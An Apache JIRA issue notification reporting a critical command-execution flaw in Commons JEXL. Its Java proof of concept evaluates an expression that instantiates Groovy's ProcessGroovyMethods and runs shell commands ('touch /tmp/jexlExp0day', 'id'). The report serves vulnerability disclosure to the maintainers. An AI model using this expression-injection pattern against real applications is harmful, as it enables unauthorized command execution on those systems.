cnbird created JEXL-223: --------------------------- Summary: Apache Commons JEXL Expression Execute Command Vulnerabilitity Key: JEXL-223 URL: https://issues.apache.org/jira/browse/JEXL-223 Project: Commons JEXL Issue Type: Bug Reporter: cnbird Priority: Critical
0x01 Summary Apache Commons JEXL Expression Execute Command Vulnerabilitity throught groovy. 0x02 POC import java.io.IOException; import java.util.List; import org.apache.commons.jexl3.JexlBuilder; import org.apache.commons.jexl3.JexlContext; import org.apache.commons.jexl3.JexlEngine; import org.apache.commons.jexl3.JexlExpression; import org.apache.commons.jexl3.MapContext; import org.codehaus.groovy.runtime.ProcessGroovyMethods; public class elExp { public static void main(String args[]) throws IOException { // Create or retrieve an engine JexlEngine jexl = new JexlBuilder().create(); // Create an expression //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")"; ProcessGroovyMethods n = new ProcessGroovyMethods(); System.out.println(n.execute("id").toString()); String jexlExp = "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch /tmp/jexlExp0day\")"; JexlExpression e = jexl.createExpression( jexlExp ); try { Process process = new ProcessBuilder("id").start(); } catch (IOException e1) { // TODO Auto-generated catch block e1.printStackTrace(); } // Create a context and add data JexlContext jc = new MapContext(); jc.set("foo", jexlExp ); // Now evaluate the expression, getting the result Object o = e.evaluate(jc); System.out.println(o); } } -- This message was sent by Atlassian JIRA (v6.3.15#6346)